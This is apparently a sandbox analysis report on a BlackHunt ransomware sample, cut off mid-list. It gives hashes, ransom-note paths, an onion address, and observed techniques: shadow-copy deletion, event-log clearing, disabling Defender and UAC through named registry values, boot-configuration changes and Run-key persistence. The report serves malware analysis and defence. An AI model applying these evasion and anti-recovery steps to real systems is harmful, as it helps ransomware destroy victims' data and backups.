Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:45
Static task
static1
Behavioral task
behavioral1
Sample
71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe
Resource
win10v2004-20231222-en
General
-
Target
71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe
-
Size
707KB
-
MD5
abb439196ea8611e14ee09f25bfd8b6e
-
SHA1
98edcfc0fd2808db1aa2c575de5884e563347d87
-
SHA256
71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca
-
SHA512
494b765f3e286344b2adc7942e44ff1c14309563a23b8b94541a71a2bd7c1ca9fe83daa6441c807225937b4b8ada81bace1ae322cc5589e5f2f2febce553699f
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1B84vnh:6uaTmkZJ+naie5OTamgEoKxLW0Gh
Malware Config
Extracted
C:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5940 fsutil.exe 11056 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" cmd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 7400 wevtutil.exe 15660 wevtutil.exe 8436 wevtutil.exe 15468 wevtutil.exe 16020 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 5896 bcdedit.exe 5396 bcdedit.exe 16660 bcdedit.exe 11032 bcdedit.exe -
Renames multiple (3384) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5908 wbadmin.exe 10896 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\I: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\S: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\N: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\T: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\Y: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\A: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\L: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\X: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\Z: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\M: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\E: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\U: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\O: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\H: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\P: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\J: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\V: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\W: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\K: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\B: 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened (read-only) \??\M: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\#BlackHunt_ReadMe.txt 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ar-ae\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\#BlackHunt_ReadMe.txt 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\#BlackHunt_ReadMe.hta 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\ui-strings.js 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\#BlackHunt_ReadMe.txt 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\ui-strings.js 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ar-ae\#BlackHunt_ReadMe.hta 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\#BlackHunt_ReadMe.txt 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\ui-strings.js 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\#BlackHunt_ReadMe.hta 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ko-kr\#BlackHunt_ReadMe.hta 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\#BlackHunt_ReadMe.hta 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sk-sk\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\ui-strings.js 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\#BlackHunt_ReadMe.txt 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files\Reference Assemblies\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\#BlackHunt_ReadMe.hta 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-de_de.gif 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\dot.cur 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\#BlackHunt_ReadMe.hta 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close2x.png 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\relaxngdatatype.md 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\#BlackHunt_ReadMe.hta 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\ui-strings.js 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\#BlackHunt_ReadMe.txt 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions2x.png 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_auditreport_18.svg 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\#BlackHunt_ReadMe.hta 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugin.js 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ru_135x40.svg 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\new_icons.png 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nl-nl\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files\OutReceive.wmf 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files\VideoLAN\VLC\locale\et\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\#BlackHunt_ReadMe.hta 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\ui-strings.js 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons.png 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\#BlackHunt_ReadMe.txt 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfxswt.jar 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files\VideoLAN\VLC\locale\te\#BlackHunt_ReadMe.hta 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\#BlackHunt_ReadMe.hta 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\#BlackHunt_ReadMe.txt 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_closereview_18.svg 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\ui-strings.js 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-tw\ui-strings.js 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\tr-tr\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#BlackHunt_Private.key 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\he-il\#BlackHunt_ReadMe.txt 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\nub.png 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\jopt-simple.md 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 16152 10600 WerFault.exe 296 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6464 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 8324 vssadmin.exe 5720 vssadmin.exe 5564 vssadmin.exe 6924 vssadmin.exe 7920 vssadmin.exe 6312 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 16672 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 Conhost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 7588 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe Token: SeRestorePrivilege 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe Token: SeBackupPrivilege 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe Token: SeTakeOwnershipPrivilege 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe Token: SeAuditPrivilege 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe Token: SeSecurityPrivilege 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe Token: SeIncBasePriorityPrivilege 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe Token: SeBackupPrivilege 8508 vssvc.exe Token: SeRestorePrivilege 8508 vssvc.exe Token: SeAuditPrivilege 8508 vssvc.exe Token: SeBackupPrivilege 11372 wbengine.exe Token: SeRestorePrivilege 11372 wbengine.exe Token: SeSecurityPrivilege 11372 wbengine.exe Token: SeSecurityPrivilege 15660 wevtutil.exe Token: SeBackupPrivilege 15660 wevtutil.exe Token: SeSecurityPrivilege 8436 wevtutil.exe Token: SeBackupPrivilege 8436 wevtutil.exe Token: SeSecurityPrivilege 15468 wevtutil.exe Token: SeBackupPrivilege 15468 wevtutil.exe Token: SeSecurityPrivilege 7400 wevtutil.exe Token: SeBackupPrivilege 7400 wevtutil.exe Token: SeSecurityPrivilege 16020 wevtutil.exe Token: SeBackupPrivilege 16020 wevtutil.exe Token: SeDebugPrivilege 16672 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1556 wrote to memory of 2732 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 193 PID 1556 wrote to memory of 2732 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 193 PID 1556 wrote to memory of 1848 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 93 PID 1556 wrote to memory of 1848 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 93 PID 1556 wrote to memory of 3096 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 95 PID 1556 wrote to memory of 3096 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 95 PID 1556 wrote to memory of 1040 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 169 PID 1556 wrote to memory of 1040 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 169 PID 1556 wrote to memory of 3024 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 189 PID 1556 wrote to memory of 3024 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 189 PID 1556 wrote to memory of 4808 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 177 PID 1556 wrote to memory of 4808 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 177 PID 1556 wrote to memory of 1316 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 103 PID 1556 wrote to memory of 1316 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 103 PID 1556 wrote to memory of 5104 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 114 PID 1556 wrote to memory of 5104 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 114 PID 1556 wrote to memory of 4744 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 105 PID 1556 wrote to memory of 4744 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 105 PID 1556 wrote to memory of 1020 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 113 PID 1556 wrote to memory of 1020 1556 